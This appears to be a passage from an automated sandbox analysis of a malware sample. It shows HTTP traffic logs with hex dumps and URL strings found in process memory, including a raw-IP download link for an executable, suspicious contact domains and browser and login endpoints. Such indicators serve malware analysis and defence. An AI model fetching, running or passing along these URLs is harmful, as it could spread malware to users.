3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:10:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:10:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:10:25 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: recover.exe, 00000003.00000003.3092659925.0000000003371000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.148.45/dashboard/xl.exe
                Source: recover.exe, 00000003.00000003.3092659925.0000000003371000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.148.45/dashboard/xl.exe&
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4206800241.0000000004C6E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002059.xyz
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4206800241.0000000004C6E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002059.xyz/er88/
                Source: recover.exe, 00000003.00000002.4205854920.0000000004DE2000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000036A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYz
                Source: firefox.exe, 00000008.00000002.2219879934.0000000025054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.idsmart.online/jbgy/?9B_ppt=WpM
                Source: recover.exe, 00000003.00000002.4205854920.0000000005106000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000039C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: recover.exe, 00000003.00000002.4204255129.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: recover.exe, 00000003.00000002.4204255129.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: recover.exe, 00000003.00000002.4204255129.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: recover.exe, 00000003.00000003.2107451608.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: recover.exe, 00000003.00000002.4205854920.000000000492C000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000031EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tenmyk.shop/irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0c
                Source: recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.0000000003B58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
